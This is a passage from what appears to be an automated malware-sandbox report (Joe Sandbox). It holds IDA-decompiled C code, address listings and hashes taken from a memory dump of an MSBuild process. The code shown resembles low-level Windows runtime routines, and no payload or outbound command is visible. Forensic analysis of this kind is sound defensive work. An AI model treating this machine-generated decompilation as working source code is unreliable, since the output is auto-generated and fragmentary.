                                            								}
                                            								asm("lock cmpxchg [esi], ecx");
                                            								if(_t87 != _t87) {
                                            									_t74 = _v12;
                                            									_t59 = 0;
                                            									_t79 = _v5;
                                            									continue;
                                            								}
                                            								if(_v6 != 0) {
                                            									_t74 = _v12;
                                            									L25:
                                            									if(_v7 != 0) {
                                            										if(_t74 < 0x7d0) {
                                            											if(_v8 == 0) {
                                            												_t74 = _t74 + 1;
                                            											}
                                            										}
                                            										_t38 = _t90 + 0x14; // 0x0
                                            										_t39 = _t90 + 0x14; // 0x0
                                            										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                            										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                            											_t85 = _t85 & 0xff000000;
                                            										}
                                            										 *(_t90 + 0x14) = _t85;
                                            									}
                                            									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                            									 *((intOrPtr*)(_t90 + 8)) = 1;
                                            									return 0;
                                            								}
                                            								_v5 = 1;
                                            								_t87 = _t74;
                                            								goto L19;
                                            							}
                                            						}
                                            						_t94 = _t74;
                                            						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                            						if(_t74 == 0) {
                                            							goto L12;
                                            						} else {
                                            							_t91 = _t90 + 4;
                                            							goto L8;
                                            							L9:
                                            							while((_t81 & 0x00000001) != 0) {
                                            								_t69 = _t81;
                                            								asm("lock cmpxchg [edi], edx");
                                            								if(_t69 != _t81) {
                                            									_t81 = _t69;
                                            									continue;
                                            								}
                                            								_t90 = _v16;
                                            								goto L25;
                                            							}
                                            							asm("pause");
                                            							_t94 = _t94 - 1;
                                            							if(_t94 != 0) {
                                            								L8:
                                            								_t81 =  *_t91;
                                            								goto L9;
                                            							} else {
                                            								_t90 = _v16;
                                            								_t79 = _v5;
                                            								goto L12;
                                            							}
                                            						}
                                            					}
                                            				}
                                            			}




























                                            0x0101ef4b
                                            0x0101ef4d
                                            0x0101ef57
                                            0x0101f0bd
                                            0x0101f0c2
                                            0x0101f0d2
                                            0x0101f0d2
                                            0x0101f0c2
                                            0x0101ef5d
                                            0x0101ef5f
                                            0x0101ef67
                                            0x0101ef6a
                                            0x0101ef6d
                                            0x0101ef74
                                            0x0101ef7f
                                            0x0101ef82
                                            0x0101ef82
                                            0x0101ef86
                                            0x0101ef88
                                            0x0101ef8c
                                            0x0101ef8f
                                            0x0101ef8f
                                            0x0101ef8f
                                            0x00000000
                                            0x0101ef91
                                            0x0101ef93
                                            0x0101efc4
                                            0x0101efc4
                                            0x0101efc4
                                            0x0101efca
                                            0x0101efd0
                                            0x0101f0a6
                                            0x00000000
                                            0x00000000
                                            0x0101f0af
                                            0x0106bb06
                                            0x0106bb0a
                                            0x0101f0b5
                                            0x0101f0b5
                                            0x0101f0b5
                                            0x0101f0b5
                                            0x00000000
                                            0x0101efd6
                                            0x0101efd9
                                            0x0101f0de
                                            0x0101f0e2
                                            0x0101efdf
                                            0x0101efdf
                                            0x0101efdf
                                            0x0101efe5
                                            0x0106bafc
                                            0x0106bafc
                                            0x0101efe5
                                            0x0101efeb
                                            0x0101efed
                                            0x0101f00f
                                            0x0101f011
                                            0x0101f01a
                                            0x0101f01d
                                            0x0101f021
                                            0x0101f028
                                            0x0101f029
                                            0x0101f029
                                            0x0101f02c
                                            0x00000000
                                            0x0101f02c
                                            0x0101eff3
                                            0x0101eff9
                                            0x0101f0ea
                                            0x0101f0ed
                                            0x0101f0ef
                                            0x00000000
                                            0x0101f0ef
                                            0x0101f003
                                            0x0106bb12
                                            0x0101f045
                                            0x0101f049
                                            0x0101f051
                                            0x0101f09e
                                            0x0101f0a0
                                            0x0101f0a0
                                            0x0101f09e
                                            0x0101f053
                                            0x0101f064
                                            0x0101f064
                                            0x0101f06b
                                            0x0106bb1a
                                            0x0106bb1a
                                            0x0101f071
                                            0x0101f071
                                            0x0101f07d
                                            0x0101f082
                                            0x0101f08f
                                            0x0101f08f
                                            0x0101f009
                                            0x0101f00d
                                            0x00000000
                                            0x0101f00d
                                            0x0101efd0
                                            0x0101ef97
                                            0x0101efa5
                                            0x0101efaa
                                            0x00000000
                                            0x0101efac
                                            0x0101efac
                                            0x0101efac
                                            0x00000000
                                            0x0101efb2
                                            0x0101f036
                                            0x0101f03a
                                            0x0101f040
                                            0x0101f090
                                            0x00000000
                                            0x0101f092
                                            0x0101f042
                                            0x00000000
                                            0x0101f042
                                            0x0101efb7
                                            0x0101efb9
                                            0x0101efbc
                                            0x0101efb0
                                            0x0101efb0
                                            0x00000000
                                            0x0101efbe
                                            0x0101efbe
                                            0x0101efc1
                                            0x00000000
                                            0x0101efc1
                                            0x0101efbc
                                            0x0101efaa
                                            0x0101ef91

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                            • Instruction ID: e77c935eb47595bf3983dcbabc77cb48e0fe41d86bb932275777836fdef34780
                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                            • Instruction Fuzzy Hash: 7551E630A0424ADFEB66CB6CC0947AEBBF1AF05314F1481ECE9C597286C379A989C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E010D740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                            				signed short* _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _t55;
                                            				void* _t56;
                                            				intOrPtr* _t66;
                                            				intOrPtr* _t69;
                                            				void* _t74;
                                            				intOrPtr* _t78;
                                            				intOrPtr* _t81;
                                            				intOrPtr* _t82;
                                            				intOrPtr _t83;
                                            				signed short* _t84;
                                            				intOrPtr _t85;
                                            				signed int _t87;
                                            				intOrPtr* _t90;
                                            				intOrPtr* _t93;
                                            				intOrPtr* _t94;
                                            				void* _t98;
                                            
                                            				_t84 = __edx;
                                            				_t80 = __ecx;
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t55 = __ecx;
                                            				_v8 = __edx;
                                            				_t87 =  *__edx & 0x0000ffff;
                                            				_v12 = __ecx;
                                            				_t3 = _t55 + 0x154; // 0x154
                                            				_t93 = _t3;
                                            				_t78 =  *_t93;
                                            				_t4 = _t87 + 2; // 0x2
                                            				_t56 = _t4;
                                            				while(_t78 != _t93) {
                                            					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                            						L4:
                                            						_t78 =  *_t78;
                                            						continue;
                                            					} else {
                                            						_t7 = _t78 + 0x18; // 0x18
                                            						if(E0105D4F0(_t7, _t84[2], _t87) == _t87) {
                                            							_t40 = _t78 + 0xc; // 0xc
                                            							_t94 = _t40;
                                            							_t90 =  *_t94;
                                            							while(_t90 != _t94) {
                                            								_t41 = _t90 + 8; // 0x8
                                            								_t74 = E0104F380(_a4, _t41, 0x10);
                                            								_t98 = _t98 + 0xc;
                                            								if(_t74 != 0) {
                                            									_t90 =  *_t90;
                                            									continue;
                                            								}
                                            								goto L12;
                                            							}
                                            							_t82 = L01024620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                            							if(_t82 != 0) {
                                            								_t46 = _t78 + 0xc; // 0xc
                                            								_t69 = _t46;
                                            								asm("movsd");
                                            								asm("movsd");
                                            								asm("movsd");
                                            								asm("movsd");
                                            								_t85 =  *_t69;
                                            								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            									L20:
                                            									_t82 = 3;
                                            									asm("int 0x29");
                                            								}
                                            								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                            								 *_t82 = _t85;
                                            								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                            								 *_t69 = _t82;
                                            								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                            								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                            								goto L11;
                                            							} else {
                                            								L18:
                                            								_push(0xe);
                                            								_pop(0);
                                            							}
                                            						} else {
                                            							_t84 = _v8;
                                            							_t9 = _t87 + 2; // 0x2
                                            							_t56 = _t9;
                                            							goto L4;
                                            						}
                                            					}
                                            					L12:
                                            					return 0;
                                            				}
                                            				_t10 = _t87 + 0x1a; // 0x1a
                                            				_t78 = L01024620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                            				if(_t78 == 0) {
                                            					goto L18;
                                            				} else {
                                            					_t12 = _t87 + 2; // 0x2
                                            					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                            					_t16 = _t78 + 0x18; // 0x18
                                            					E0104F3E0(_t16, _v8[2], _t87);
                                            					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                            					_t19 = _t78 + 0xc; // 0xc
                                            					_t66 = _t19;
                                            					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                            					 *_t66 = _t66;
                                            					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                            					_t81 = L01024620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                            					if(_t81 == 0) {
                                            						goto L18;
                                            					} else {
                                            						_t26 = _t78 + 0xc; // 0xc
                                            						_t69 = _t26;
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t85 =  *_t69;
                                            						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            							goto L20;
                                            						} else {
                                            							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                            							 *_t81 = _t85;
                                            							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                            							 *_t69 = _t81;
                                            							_t83 = _v12;
                                            							 *(_t78 + 8) = 1;
                                            							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                            							_t34 = _t83 + 0x154; // 0x1ba
                                            							_t69 = _t34;
                                            							_t85 =  *_t69;
                                            							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            								goto L20;
                                            							} else {
                                            								 *_t78 = _t85;
                                            								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                            								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                            								 *_t69 = _t78;
                                            								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                            							}
                                            						}
                                            						goto L11;
                                            					}
                                            				}
                                            				goto L12;
                                            			}





















                                            0x010d740d
                                            0x010d740d
                                            0x010d7412
                                            0x010d7413
                                            0x010d7416
                                            0x010d7418
                                            0x010d741c
                                            0x010d741f
                                            0x010d7422
                                            0x010d7422
                                            0x010d7428
                                            0x010d742a
                                            0x010d742a
                                            0x010d7451
                                            0x010d7432
                                            0x010d744f
                                            0x010d744f
                                            0x00000000
                                            0x010d7434
                                            0x010d7438
                                            0x010d7443
                                            0x010d7517
                                            0x010d7517
                                            0x010d751a
                                            0x010d7535
                                            0x010d7520
                                            0x010d7527
                                            0x010d752c
                                            0x010d7531
                                            0x010d7533
                                            0x00000000
                                            0x010d7533
                                            0x00000000
                                            0x010d7531
                                            0x010d754b
                                            0x010d754f
                                            0x010d755c
                                            0x010d755c
                                            0x010d755f
                                            0x010d7560
                                            0x010d7561
                                            0x010d7562
                                            0x010d7563
                                            0x010d7568
                                            0x010d756a
                                            0x010d756c
                                            0x010d756d
                                            0x010d756d
                                            0x010d756f
                                            0x010d7572
                                            0x010d7574
                                            0x010d7577
                                            0x010d757c
                                            0x010d757f
                                            0x00000000
                                            0x010d7551
                                            0x010d7551
                                            0x010d7551
                                            0x010d7553
                                            0x010d7553
                                            0x010d7449
                                            0x010d7449
                                            0x010d744c
                                            0x010d744c
                                            0x00000000
                                            0x010d744c
                                            0x010d7443
                                            0x010d750e
                                            0x010d7514
                                            0x010d7514
                                            0x010d7455
                                            0x010d7469
                                            0x010d746d
                                            0x00000000
                                            0x010d7473
                                            0x010d7473
                                            0x010d7476
                                            0x010d7480
                                            0x010d7484
                                            0x010d748e
                                            0x010d7493
                                            0x010d7493
                                            0x010d7496
                                            0x010d7499
                                            0x010d74a1
                                            0x010d74b1
                                            0x010d74b5
                                            0x00000000
                                            0x010d74bb
                                            0x010d74c1
                                            0x010d74c1
                                            0x010d74c4
                                            0x010d74c5
                                            0x010d74c6
                                            0x010d74c7
                                            0x010d74c8
                                            0x010d74cd
                                            0x00000000
                                            0x010d74d3
                                            0x010d74d3
                                            0x010d74d6
                                            0x010d74d8
                                            0x010d74db
                                            0x010d74dd
                                            0x010d74e0
                                            0x010d74e7
                                            0x010d74ee
                                            0x010d74ee
                                            0x010d74f4
                                            0x010d74f9
                                            0x00000000
                                            0x010d74fb
                                            0x010d74fb
                                            0x010d74fd
                                            0x010d7500
                                            0x010d7503
                                            0x010d7505
                                            0x010d7505
                                            0x010d74f9
                                            0x00000000
                                            0x010d74cd
                                            0x010d74b5
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                            • Instruction ID: 21d555c8add9ba4513d7168c31c794a1b3a7d8eab8685958cfbc9a31141caa70
                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                            • Instruction Fuzzy Hash: 90518D71600646EFDB16CF18C480A96BBF5FF45308F54C0AAE948DF256E7B1E946CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E01032990() {
                                            				signed int* _t62;
                                            				signed int _t64;
                                            				intOrPtr _t66;
                                            				signed short* _t69;
                                            				intOrPtr _t76;
                                            				signed short* _t79;
                                            				void* _t81;
                                            				signed int _t82;
                                            				signed short* _t83;
                                            				signed int _t87;
                                            				intOrPtr _t91;
                                            				void* _t98;
                                            				signed int _t99;
                                            				void* _t101;
                                            				signed int* _t102;
                                            				void* _t103;
                                            				void* _t104;
                                            				void* _t107;
                                            
                                            				_push(0x20);
                                            				_push(0x10dff00);
                                            				E0105D08C(_t81, _t98, _t101);
                                            				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                            				_t99 = 0;
                                            				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                            				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                            				if(_t82 == 0) {
                                            					_t62 = 0xc0000100;
                                            				} else {
                                            					 *((intOrPtr*)(_t103 - 4)) = 0;
                                            					_t102 = 0xc0000100;
                                            					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                            					_t64 = 4;
                                            					while(1) {
                                            						 *(_t103 - 0x24) = _t64;
                                            						if(_t64 == 0) {
                                            							break;
                                            						}
                                            						_t87 = _t64 * 0xc;
                                            						 *(_t103 - 0x2c) = _t87;
                                            						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xfe1664));
                                            						if(_t107 <= 0) {
                                            							if(_t107 == 0) {
                                            								_t79 = E0104E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xfe1668)), _t82);
                                            								_t104 = _t104 + 0xc;
                                            								__eflags = _t79;
                                            								if(__eflags == 0) {
                                            									_t102 = E010851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xfe166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                            									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                            									break;
                                            								} else {
                                            									_t64 =  *(_t103 - 0x24);
                                            									goto L5;
                                            								}
                                            								goto L13;
                                            							} else {
                                            								L5:
                                            								_t64 = _t64 - 1;
                                            								continue;
                                            							}
                                            						}
                                            						break;
                                            					}
                                            					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                            					__eflags = _t102;
                                            					if(_t102 < 0) {
                                            						__eflags = _t102 - 0xc0000100;
                                            						if(_t102 == 0xc0000100) {
                                            							_t83 =  *((intOrPtr*)(_t103 + 8));
                                            							__eflags = _t83;
                                            							if(_t83 != 0) {
                                            								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                            								__eflags =  *_t83 - _t99;
                                            								if( *_t83 == _t99) {
                                            									_t102 = 0xc0000100;
                                            									goto L19;
                                            								} else {
                                            									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                            									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                            									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                            									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                            										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                            										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                            											L26:
                                            											_t102 = E01032AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                            											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                            											__eflags = _t102 - 0xc0000100;
                                            											if(_t102 != 0xc0000100) {
                                            												goto L12;
                                            											} else {
                                            												_t99 = 1;
                                            												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                            												goto L18;
                                            											}
                                            										} else {
                                            											_t69 = E01016600( *((intOrPtr*)(_t91 + 0x1c)));
                                            											__eflags = _t69;
                                            											if(_t69 != 0) {
                                            												goto L26;
                                            											} else {
                                            												_t83 =  *((intOrPtr*)(_t103 + 8));
                                            												goto L18;
                                            											}
                                            										}
                                            									} else {
                                            										L18:
                                            										_t102 = E01032C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                            										L19:
                                            										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                            										goto L12;
                                            									}
                                            								}
                                            								L28:
                                            							} else {
                                            								E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            								 *((intOrPtr*)(_t103 - 4)) = 1;
                                            								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                            								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                            								_t76 = E01032AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                            								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                            								__eflags = _t76 - 0xc0000100;
                                            								if(_t76 == 0xc0000100) {
                                            									 *((intOrPtr*)(_t103 - 0x1c)) = E01032C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                            								}
                                            								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                            								E01032ACB();
                                            							}
                                            						}
                                            					}
                                            					L12:
                                            					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                            					_t62 = _t102;
                                            				}
                                            				L13:
                                            				return E0105D0D1(_t62);
                                            				goto L28;
                                            			}





















                                            0x01032990
                                            0x01032992
                                            0x01032997
                                            0x010329a3
                                            0x010329a6
                                            0x010329ab
                                            0x010329ad
                                            0x010329b2
                                            0x01075c80
                                            0x010329b8
                                            0x010329b8
                                            0x010329bb
                                            0x010329c0
                                            0x010329c5
                                            0x010329c6
                                            0x010329c6
                                            0x010329cb
                                            0x00000000
                                            0x00000000
                                            0x010329cd
                                            0x010329d0
                                            0x010329d9
                                            0x010329db
                                            0x010329dd
                                            0x01032a7f
                                            0x01032a84
                                            0x01032a87
                                            0x01032a89
                                            0x01075ca1
                                            0x01075ca3
                                            0x00000000
                                            0x01032a8f
                                            0x01032a8f
                                            0x00000000
                                            0x01032a8f
                                            0x00000000
                                            0x010329e3
                                            0x010329e3
                                            0x010329e3
                                            0x00000000
                                            0x010329e3
                                            0x010329dd
                                            0x00000000
                                            0x010329db
                                            0x010329e6
                                            0x010329e9
                                            0x010329eb
                                            0x010329ed
                                            0x010329f3
                                            0x010329f5
                                            0x010329f8
                                            0x010329fa
                                            0x01032a97
                                            0x01032a9a
                                            0x01032a9d
                                            0x01032add
                                            0x00000000
                                            0x01032a9f
                                            0x01032aa2
                                            0x01032aa5
                                            0x01032aa8
                                            0x01032aab
                                            0x01075cab
                                            0x01075caf
                                            0x01075cc5
                                            0x01075cda
                                            0x01075cdc
                                            0x01075cdf
                                            0x01075ce5
                                            0x00000000
                                            0x01075ceb
                                            0x01075ced
                                            0x01075cee
                                            0x00000000
                                            0x01075cee
                                            0x01075cb1
                                            0x01075cb4
                                            0x01075cb9
                                            0x01075cbb
                                            0x00000000
                                            0x01075cbd
                                            0x01075cbd
                                            0x00000000
                                            0x01075cbd
                                            0x01075cbb
                                            0x01032ab1
                                            0x01032ab1
                                            0x01032ac4
                                            0x01032ac6
                                            0x01032ac6
                                            0x00000000
                                            0x01032ac6
                                            0x01032aab
                                            0x00000000
                                            0x01032a00
                                            0x01032a09
                                            0x01032a0e
                                            0x01032a21
                                            0x01032a24
                                            0x01032a35
                                            0x01032a3a
                                            0x01032a3d
                                            0x01032a42
                                            0x01032a59
                                            0x01032a59
                                            0x01032a5c
                                            0x01032a5f
                                            0x01032a5f
                                            0x010329fa
                                            0x010329f3
                                            0x01032a64
                                            0x01032a64
                                            0x01032a6b
                                            0x01032a6b
                                            0x01032a6d
                                            0x01032a72
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fb7b9dd6e637312aa96181289d4bfc3b18d8e1fbb44a2c932d22e4b49c04880
                                            • Instruction ID: f0af6efeb8892c4a86db5b2d44815c11d5ed489973ff5ecc63153df3da25ff04
                                            • Opcode Fuzzy Hash: 3fb7b9dd6e637312aa96181289d4bfc3b18d8e1fbb44a2c932d22e4b49c04880
                                            • Instruction Fuzzy Hash: D7516B7190061ADFDF25DF99C880ADEBBB9FF88350F158055E995AB220C3359D52CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E01034BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                            				signed int _v8;
                                            				short _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				char _v36;
                                            				char _v156;
                                            				short _v158;
                                            				intOrPtr _v160;
                                            				char _v164;
                                            				intOrPtr _v168;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t45;
                                            				intOrPtr _t74;
                                            				signed char _t77;
                                            				intOrPtr _t84;
                                            				char* _t85;
                                            				void* _t86;
                                            				intOrPtr _t87;
                                            				signed short _t88;
                                            				signed int _t89;
                                            
                                            				_t83 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t89;
                                            				_t45 = _a8 & 0x0000ffff;
                                            				_v158 = __edx;
                                            				_v168 = __ecx;
                                            				if(_t45 == 0) {
                                            					L22:
                                            					_t86 = 6;
                                            					L12:
                                            					E0100CC50(_t86);
                                            					L11:
                                            					return E0104B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                            				}
                                            				_t77 = _a4;
                                            				if((_t77 & 0x00000001) != 0) {
                                            					goto L22;
                                            				}
                                            				_t8 = _t77 + 0x34; // 0xdce0ba00
                                            				if(_t45 !=  *_t8) {
                                            					goto L22;
                                            				}
                                            				_t9 = _t77 + 0x24; // 0x10f8504
                                            				E01022280(_t9, _t9);
                                            				_t87 = 0x78;
                                            				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                            				E0104FA60( &_v156, 0, _t87);
                                            				_t13 = _t77 + 0x30; // 0x3db8
                                            				_t85 =  &_v156;
                                            				_v36 =  *_t13;
                                            				_v28 = _v168;
                                            				_v32 = 0;
                                            				_v24 = 0;
                                            				_v20 = _v158;
                                            				_v160 = 0;
                                            				while(1) {
                                            					_push( &_v164);
                                            					_push(_t87);
                                            					_push(_t85);
                                            					_push(0x18);
                                            					_push( &_v36);
                                            					_push(0x1e);
                                            					_t88 = E0104B0B0();
                                            					if(_t88 != 0xc0000023) {
                                            						break;
                                            					}
                                            					if(_t85 !=  &_v156) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                            					}
                                            					_t84 = L01024620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                            					_v168 = _v164;
                                            					if(_t84 == 0) {
                                            						_t88 = 0xc0000017;
                                            						goto L19;
                                            					} else {
                                            						_t74 = _v160 + 1;
                                            						_v160 = _t74;
                                            						if(_t74 >= 0x10) {
                                            							L19:
                                            							_t86 = E0100CCC0(_t88);
                                            							if(_t86 != 0) {
                                            								L8:
                                            								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                            								_t30 = _t77 + 0x24; // 0x10f8504
                                            								E0101FFB0(_t77, _t84, _t30);
                                            								if(_t84 != 0 && _t84 !=  &_v156) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                            								}
                                            								if(_t86 != 0) {
                                            									goto L12;
                                            								} else {
                                            									goto L11;
                                            								}
                                            							}
                                            							L6:
                                            							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                            							if(_v164 != 0) {
                                            								_t83 = _t84;
                                            								E01034F49(_t77, _t84);
                                            							}
                                            							goto L8;
                                            						}
                                            						_t87 = _v168;
                                            						continue;
                                            					}
                                            				}
                                            				if(_t88 != 0) {
                                            					goto L19;
                                            				}
                                            				goto L6;
                                            			}


























                                            0x01034bad
                                            0x01034bbf
                                            0x01034bc2
                                            0x01034bc6
                                            0x01034bcd
                                            0x01034bd9
                                            0x010767fe
                                            0x01076800
                                            0x01034ccc
                                            0x01034ccd
                                            0x01034cb7
                                            0x01034cc9
                                            0x01034cc9
                                            0x01034bdf
                                            0x01034be5
                                            0x00000000
                                            0x00000000
                                            0x01034beb
                                            0x01034bef
                                            0x00000000
                                            0x00000000
                                            0x01034bf5
                                            0x01034bf9
                                            0x01034c06
                                            0x01034c0b
                                            0x01034c17
                                            0x01034c1c
                                            0x01034c1f
                                            0x01034c25
                                            0x01034c33
                                            0x01034c3d
                                            0x01034c40
                                            0x01034c43
                                            0x01034c47
                                            0x01034c4d
                                            0x01034c53
                                            0x01034c54
                                            0x01034c55
                                            0x01034c56
                                            0x01034c5b
                                            0x01034c5c
                                            0x01034c63
                                            0x01034c6b
                                            0x00000000
                                            0x00000000
                                            0x01076776
                                            0x01076784
                                            0x01076784
                                            0x0107679f
                                            0x010767a7
                                            0x010767af
                                            0x010767ce
                                            0x00000000
                                            0x010767b1
                                            0x010767b7
                                            0x010767b8
                                            0x010767c1
                                            0x010767d3
                                            0x010767d9
                                            0x010767dd
                                            0x01034c94
                                            0x01034c94
                                            0x01034c98
                                            0x01034c9c
                                            0x01034ca3
                                            0x010767f4
                                            0x010767f4
                                            0x01034cb5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01034cb5
                                            0x01034c79
                                            0x01034c7e
                                            0x01034c89
                                            0x01034c8b
                                            0x01034c8f
                                            0x01034c8f
                                            0x00000000
                                            0x01034c89
                                            0x010767c3
                                            0x00000000
                                            0x010767c3
                                            0x010767af
                                            0x01034c73
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 027368608b02d4afa6ceaa17b6ab4058538b8c13af879c3907556800443e5fdc
                                            • Instruction ID: 252a61dbcdd210b3d86753f4a5f438605cf8504bbaf0b03e011129a954922ab0
                                            • Opcode Fuzzy Hash: 027368608b02d4afa6ceaa17b6ab4058538b8c13af879c3907556800443e5fdc
                                            • Instruction Fuzzy Hash: 7C41BF31A006299BDB61DF68C940BEAB7F8FF45740F0100A5E989AB241DB759E84CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E01034D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				char _v176;
                                            				char _v177;
                                            				char _v184;
                                            				intOrPtr _v192;
                                            				intOrPtr _v196;
                                            				void* __ebx;
                                            				void* __edi;
